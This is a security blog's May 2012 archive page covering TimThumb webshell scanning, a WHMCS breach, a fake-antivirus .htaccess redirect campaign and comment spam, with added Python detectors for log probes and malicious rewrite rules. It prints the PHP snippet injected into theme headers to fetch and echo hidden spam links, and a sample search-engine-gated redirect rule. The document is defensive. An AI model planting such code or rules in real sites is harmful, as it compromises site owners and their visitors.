Archives for May 2012

List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb-related attacks for a while, and they are still in full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for that type of attack, and a botnet with more than 1,000 IP addresses scanning for sites that might be vulnerable to it.

If you look at your logs, this is what it looks like:

    - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src= HTTP/1.1" 404 9347 "-" ""

or

    - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src= HTTP/1.1" 404 305 "-" ""

They are basically searching for hundreds of themes per site that could have the old timthumb.php enabled, and attempting to insert the backdoors from and on it.
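A small detector for this scanning pattern, added here as an example and not part of the original post: it parses combined-format access log lines, flags requests for timthumb.php or thumb.php under a theme path that carry a src= parameter, and reports IPs that probe several themes. The log lines and IP addresses are constructed samples.

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# timthumb.php or thumb.php under any theme directory, with a src= parameter.
# The leading /+ tolerates the doubled slash ("//wp-content") seen in the second log line.
TIMTHUMB_RE = re.compile(r'^/+wp-content/themes/[^/]+/(?:timthumb|thumb)\.php\?src=', re.IGNORECASE)

def is_timthumb_probe(path):
    return bool(TIMTHUMB_RE.match(path))

def scan_log(lines, min_hits=3):
    """Return {ip: [(status, path), ...]} for IPs with at least min_hits timthumb probes.

    Scanners walk hundreds of theme names per site, so one IP hitting several different
    theme paths (mostly 404s) is the signature worth alerting on; a single request with a
    real src= value may just be a legitimate theme that uses timthumb.
    """
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_timthumb_probe(m.group("path")):
            hits[m.group("ip")].append((int(m.group("status")), m.group("path")))
    return {ip: h for ip, h in hits.items() if len(h) >= min_hits}

# Constructed sample log lines (documentation IPs); the paths mirror those quoted in the post.
SAMPLE_LOG = [
    '203.0.113.10 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src= HTTP/1.1" 404 9347 "-" ""',
    '203.0.113.10 - - [31/May/2012:03:55:36 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src= HTTP/1.1" 404 305 "-" ""',
    '203.0.113.10 - - [31/May/2012:03:55:37 +0000] "GET /wp-content/themes/twentyten/timthumb.php?src= HTTP/1.1" 404 305 "-" ""',
    '198.51.100.7 - - [31/May/2012:04:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/May/2012:04:01:05 +0000] "GET /wp-content/themes/mytheme/timthumb.php?src=http://example.org/a.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, probes in scan_log(SAMPLE_LOG).items():
        themes = {p.split("/")[-2] for _, p in probes}
        print(ip, len(probes), "timthumb probes across", len(themes), "themes")
```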

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb.

Sucuri is Hiring: Senior Security Support Analyst

It's that time again: we're actively looking for a Senior Security Support Analyst to join the family. If you are passionate about web-based malware, we want to hear from you. Details can be found here.

How To: Enhance User Security with Dreamhost

If you are using DreamHost, we recommend a few options to increase the security of your sites in their environment:

    1. Enhanced User Security

It adds a few security restrictions per site/account to minimize the chances of attacks from other users on the same shared server.

    2. Configure a different user account per site

There is also an option to create/isolate each site under a different user account. We highly recommend it to minimize cross-site reinfections.

Website Cross-site Contamination?

Learn more about the threats with cross-contamination by reading some of our recent posts: A Little Tale About Website Cross-Contamination and Website Cross-contamination: Blackhat SEO Spam Malware

How To… Submit Infected Site for Review with Bing Blacklisting Authority

Many are not aware that there are many different blacklisting authorities out there. Some are more prevalent than others, but each has its own method of submitting a site for review. In this post I want to focus on Bing as a blacklisting authority specifically.

Like all the other blacklisting authorities, Bing uses its own proprietary method for crawling your site and identifying what is and isn't a potential security issue. We can't speak to their accuracy, but if you use Internet Explorer or Bing as a search engine and you get a big red screen warning you of issues, then these are likely the guys to start with. We should also note, however, that blacklist removal is included in our clean-up process, and we would handle the following submission for you.


WHMCS Website Hacked and Database Leaked

The WHMCS website and Twitter accounts were compromised yesterday, and their full database (and files) were posted online.

WHMCS Twitter Hacked

Yes, it means that if you have an account there, or if you use any of the WHMCS products, you have to change all your passwords ASAP, and wait for a confirmation from them before downloading anything from their website again (since it might still be compromised or contain backdoors).

They posted the following on their blog:


The Sucuri Learn Blog

We have long known that the time was approaching in which we would need to improve our level of engagement with the community and start providing more substantial contributions around managing and securing your websites. We hope to use this blog, Learn Blog, to focus specifically on this challenge, educating our audience, such that through awareness we can improve security postures.

The idea is that our existing blog at will revert to its core focus of Research and Development (R&D), and other blogs will be created to focus on specific audiences.

The evolving nature of the web ecosystem means it's no longer about hiring a webmaster to help manage and administer your website. No, instead technologies like WordPress, Joomla, osCommerce and many others have empowered users to the point where the idea of a webmaster rarely surfaces when discussing the idea of a website. This fact is how the concept of a "Learn" blog came about.

It's about clearly articulating the basics and helping improve the knowledge across the end-user spectrum, such that we can work together to combat the growing web-malware problem.

What we hope is to build a repository of knowledge that everyone can benefit from one post at a time.

If you want to know how to do something, send us a note at; if we find it useful to the masses, we'll draft up a post and share it with the world.

Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

"To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them". We are seeing many WordPress sites compromised with malware that redirects users to the "Windows Web Secure Kit" fake/rogue antivirus. So if you get that message when visiting your site (or any site), you know that it is likely compromised by it.

What is going on?

Once a site gets compromised, the .htaccess file gets modified to redirect users running Windows and coming from search engines to some Russian sites: OR OR OR many others

Which then redirects the user to some intermediate sites (also .ru):
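An added example (not from the original post) of checking an .htaccess file for the kind of conditional redirect described above: a RewriteRule to an external host that is gated on a search-engine referer and/or a Windows user agent, which is why the site owner, visiting directly, never sees it. The .htaccess content is a constructed sample and the destination host is a placeholder.

```python
import re

# Constructed sample .htaccess of the kind the post describes: only visitors who arrive from a
# search engine on a Windows browser are sent elsewhere, so the site owner never sees it.
# The destination is a placeholder, not one of the real domains.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn)\\. [NC]
RewriteCond %{HTTP_USER_AGENT} Windows [NC]
RewriteRule ^(.*)$ http://REDIRECT-DOMAIN-PLACEHOLDER.ru/in.php?a=$1 [R=302,L]

# a normal HTTPS upgrade rule that must not be flagged
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
"""

SEARCH_ENGINE_RE = re.compile(r'HTTP_REFERER.*(google|yahoo|bing|msn|ask|aol)', re.IGNORECASE)
WINDOWS_UA_RE = re.compile(r'HTTP_USER_AGENT.*(windows|msie)', re.IGNORECASE)
# RewriteRule whose target has a scheme and host, i.e. an off-site redirect
EXTERNAL_RULE_RE = re.compile(r'^RewriteRule\s+\S+\s+(https?://[^\s/]+)', re.IGNORECASE)

def find_conditional_redirects(htaccess):
    """Return [(line_no, destination_host, conditions)] for off-site RewriteRules that are
    gated on a search-engine referer and/or a Windows user agent.
    """
    findings = []
    pending = []  # RewriteCond lines seen since the last RewriteRule
    for no, raw in enumerate(htaccess.splitlines(), 1):
        line = raw.strip()
        if line.lower().startswith("rewritecond"):
            pending.append(line)
            continue
        m = EXTERNAL_RULE_RE.match(line)
        if m:
            conds = []
            if any(SEARCH_ENGINE_RE.search(c) for c in pending):
                conds.append("search-engine-referer")
            if any(WINDOWS_UA_RE.search(c) for c in pending):
                conds.append("windows-user-agent")
            if conds:
                findings.append((no, m.group(1), conds))
        if line.lower().startswith("rewriterule"):
            pending = []  # conditions apply only to the next RewriteRule
    return findings

if __name__ == "__main__":
    for no, host, conds in find_conditional_redirects(SAMPLE_HTACCESS):
        print(f"line {no}: redirect to {host} gated on {', '.join(conds)}")
```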


Official WordPress Plugin Directory – Forcing Plugin Updates

For a while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven't seen much of anything happen: no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is that updates were forced, certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.


Blog Comments – Analysing 100,000 Comments and Spammers

“Nice blog, thanks for the info”

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”

I know you like flattering comments on your website. And I know you love to see many comments on each one of your posts (say, your community participation). Who doesn't, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be more exact) comments that were sent to the network of sites that we are monitoring. How many of them are spam? Who are the most annoying spammers? And things like that.


Wpstats.org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

    // Injected into the theme header; only runs where the PHP curl extension is available.
    if (function_exists('curl_init')) {
        $url = "";                                        // remote URL elided in the post
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);      // return the body as a string
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);                           // fetch the remote list of hidden links
        curl_close($ch);
        echo "$data";                                     // write it straight into the page output
    }

If you are not familiar with PHP, this code will contact the remote URL, which will return a long list of hidden links to be included on your site (not visible in a normal browser).
